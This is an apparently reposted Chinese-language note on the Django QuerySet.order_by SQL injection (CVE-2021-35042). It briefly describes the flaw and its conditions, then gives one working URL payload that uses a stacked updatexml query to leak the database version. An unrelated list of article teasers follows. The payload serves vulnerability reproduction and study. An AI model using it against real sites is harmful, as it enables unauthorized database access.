Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)

漏洞描述

Django 于 2021年7月1日發布了一個安全更新,修復了函數QuerySet.order_by中的 SQL 注入漏洞。

參考鏈接:

  • Django security releases issued: 3.2.5 and 3.1.13 | Weblog | Django

該漏洞需要開發人員使用order_by功能。此外,還可以控制查詢集的輸入。

漏洞環境及利用

搭建docker環境

payload

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23

?

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/167063.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/167063.shtml
英文地址,請注明出處:http://en.pswp.cn/news/167063.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

加入華為云鯤鵬極簡開發創造營,激活創造力,探索無限可能!

數字經濟時代,速度、效率、質量安全已成為各行業告訴拓新發展的關鍵,華為云不斷打磨敏捷安全開發的軟件平臺,為更高效率的生產力變革積蓄能量。 在剛剛過去不久的2023華為全聯接大會上,華為最新發布了華為云CodeArts與鯤鵬DevKit…

關于配置文件中秘鑰信息加密實現方案的一些思考

關于配置文件中秘鑰信息加密實現方案的一些思考 背景實現方案 背景 配置信息文件中(代碼中), 不應該有明文的秘鑰信息. 需要找一種方案去做加密處理. 實現方案 我們可以在項目指定目錄上傳一份加密/解密程序, 例如: jasypt-gui.jar. 啟動時: 配置JVM參數, 對加密的信息進行解…

2023 Unite 大會關于“Muse“ AI 大模型訓練

Unity Muse 借助強大的 AI 能力幫助你探索、構思和迭代,其中包括紋理和精靈兩項功能,可將自然語言和視覺輸入轉化為可用資產。 將 AI 引入 Unity Editor 中的 Muse 提供了更快將想法轉化為實物的選項。您可以調整并使用文本提示、圖案、顏色和草圖&…

周總結2023-11-24

文章目錄 前言:工作:學習:生活: 前言: 保持激情,日日向上,激發內驅力。 工作: 1117上周未完成的計劃: 數模轉換模塊的數據處理分析HAL庫的學習IMU知識點匯總 1124本…

【采坑分享】導出文件流responseType:“blob“如何提示報錯信息

目錄 前言: 采坑之路 總結: 前言: 近日,項目中踩了一個坑分享一下經驗,也避免下次遇到方便解決。項目基于vue2axioselement-ui,業務中導出按鈕需要直接下載接口中的文件流。正常是沒有問題,但…

為什么在Pycharm中使用Pandas畫圖,卻不顯示?

問題描述: 在 Pycharm 中使用 Pandas 的 plot() 方法畫圖,卻不顯示圖像,源代碼如下: import pandas as pd import numpy as np# 從文件中讀取數據 starbucks pd.read_csv(./file_csv/directory.csv)# 按照國家分組,…

想問問各位大佬,網絡安全這個專業普通人學習會有前景嗎?

網絡安全是一個非常廣泛的領域,涉及到許多不同的崗位。這些崗位包括安全服務、安全運維、滲透測試、web安全、安全開發和安全售前等。每個崗位都有自己的要求和特點,您可以根據自己的興趣和能力來選擇最適合您的崗位。 滲透測試/Web安全工程師主要負責模…

對 .NET程序2G虛擬地址緊張崩潰 的最后一次反思

一:背景 1. 講故事 最近接連遇到了幾起 2G 虛擬地址緊張 導致的程序崩潰,基本上 90% 都集中在醫療行業,真的很無語,他們用的都是一些上古的 XP,Windows7 x86,我也知道技術人很難也基本無法推動硬件系統和…

抖音獲客策略:讓你的品牌在短視頻平臺一鳴驚人!

一、背景介紹 隨著移動互聯網的快速發展,抖音作為一款流行的短視頻平臺,已經成為越來越多企業的獲客渠道。抖音用戶規模龐大,日活用戶數量不斷增長,為企業提供了廣闊的市場空間。本文將介紹抖音獲客策略,幫助企業更好…

UNETR++:深入研究高效和準確的3D醫學圖像分割

論文:https://arxiv.org/abs/2212.04497 代碼:GitHub - Amshaker/unetr_plus_plus: UNETR: Delving into Efficient and Accurate 3D Medical Image Segmentation 機構:Mohamed Bin Zayed University of Artificial Intelligence1, Univers…

哦?是嗎|兜兜轉轉,最后還是選擇了蓋雅排班系統

在之前發布的和「人效案例集」中,我們為大家呈現了很多關于人效提升的理論方法,以及各家企業的人效提升提升實踐。 回過頭來,我們發現:排班管理滲透于人效九宮格之中,也因此成為很多企業人效提升的一個重要中介&#x…

深度學習八股文:混合精度訓練過程出nan怎么辦

其實如果是FP32的訓練,基本的調試方法還是差不多,這里就講一下混合精度訓練過程中的nan。 混合精度訓練使用較低的數值精度(通常是半精度浮點數,例如FP16)來加速模型訓練,但在一些情況下,可能會…

盤點43個Python登錄第三方源碼Python愛好者不容錯過

盤點43個Python登錄第三方源碼Python愛好者不容錯過 學習知識費力氣,收集整理更不易。 知識付費甚歡喜,為咱碼農謀福利。 項目名稱 bnuz中國電信校園網模擬登錄,python selenium BNUZ教務系統認證爬蟲Python語言實現,你可以用…

NX二次開發UF_CSYS_create_temp_csys 函數介紹

文章作者:里海 來源網站:https://blog.csdn.net/WangPaiFeiXingYuan UF_CSYS_create_temp_csys Defined in: uf_csys.h int UF_CSYS_create_temp_csys(const double csys_origin [ 3 ] , tag_t matrix_id, tag_t * csys_id ) overview 概述 Creates …

win10 tensorrt源碼編譯onnx

直接利用官方源碼,如下圖,trtexec源碼在TensorRT安裝目錄下,雙擊trtexec.sln文件,使用vs2019打開源碼工程。 如下圖,以yolov8為例子,編譯成功項目之后,設置命令行參數: --onnxd:/yo…

便攜式工業RFID讀寫器怎么選?

便攜式工業RFID讀寫器在物流、零售、制造等行業都有著極為廣泛的應用。企業利用RFID手持終端設備,可以將采集到的物品信息自動傳輸到中央信息系統,實現數據的實時交換和共享。目前市面上RFID手持終端品牌、型號眾多,ANDEAWELL作為國內物聯網產…

案例精選|聚銘網絡流量智能分析審計系統加強南京市溧水區人社局信息安全防護能力

一字排開的社保綜合服務窗口、實時滾動的數“智”人社大屏、便捷快速的社保卡自助服務機……每位到溧水市民中心人社大廳進行業務辦理的市民對高效的社保服務經辦效率贊嘆不已。 黨的二十大報告提出,健全覆蓋全民、統籌城鄉、公平統一、安全規范、可持續的多層次社…

淺談Linux bash腳本----截取字符串

# 用于刪除左起第一個匹配內容,即截取右側內容 ## 用于刪除右起第一個匹配內容,即截取右側內容 % 用于刪除右起第一個匹配內容,即截取左側內容 %% 用于刪除左起第一個匹配內容,即截取左側內容 舉例 file/dir1/dir2/dir3/…

GPT2-chitchat項目運行

git clone https://github.com/yangjianxin1/GPT2-chitchat.git把項目拉下來 下載模型文件: 從[模型分享]中下載模型文件,例如 model_epoch40_50w。 將模型文件放到正確的位置: 將下載的模型文件夾 model_epoch40_50w 放到項目的 model 目錄…

深入理解數據結構:隊列的實現及其應用場景

文章目錄 🍂前言🍂隊列的基本概念和特性🍂隊列的實現方式?🌱順序隊列?🌱鏈式隊列 🍂隊列的基本操作及示例代碼?🥑創建隊列?🥑判空操作?🥑入隊操作?🥑出…